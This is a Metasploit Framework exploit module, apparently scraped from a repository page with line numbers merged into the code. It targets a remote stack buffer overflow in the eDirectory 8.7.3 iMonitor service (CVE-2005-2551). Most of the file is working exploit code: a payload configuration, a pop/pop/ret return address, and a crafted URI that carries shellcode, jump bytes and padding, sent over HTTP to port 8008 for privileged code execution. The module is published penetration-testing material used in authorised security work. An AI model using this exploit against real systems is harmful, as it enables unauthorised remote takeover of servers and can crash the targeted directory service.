Path: blob/master/modules/exploits/windows/http/edirectory_imonitor.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port910include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow',17'Description' => %q{18This module exploits a stack buffer overflow in eDirectory 8.7.319iMonitor service. This vulnerability was discovered by Peter20Winter-Smith of NGSSoftware.2122NOTE: repeated exploitation attempts may cause eDirectory to crash. It does23not restart automatically in a default installation.24},25'Author' => [ 'Unknown', 'Matt Olney <scacynwrig[at]yahoo.com>' ],26'License' => BSD_LICENSE,27'References' => [28[ 'CVE', '2005-2551'],29[ 'OSVDB', '18703'],30[ 'BID', '14548'],31],32'Privileged' => true,33'DefaultOptions' => {34'EXITFUNC' => 'thread',35},36'Payload' => {37'Space' => 4150,38'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",39'StackAdjustment' => -3500,40},41'Platform' => 'win',42'Targets' => [43[ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', { 'Ret' => 0x63501f15 } ], # pop/pop/ret44],45'DisclosureDate' => '2005-08-11',46'DefaultTarget' => 0,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57Opt::RPORT(8008)58]59)60end6162def exploit63c = connect6465# pop/pop/ret in ndsimon.dlm on our jump to our shellcode66uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V')67uri << "\xe9\xbd\xef\xff\xff"68uri << "B" * 0xD06970res = c.send_request(c.request_raw({ 'uri' => uri }))71select(nil, nil, nil, 4)7273handler74disconnect75end76end777879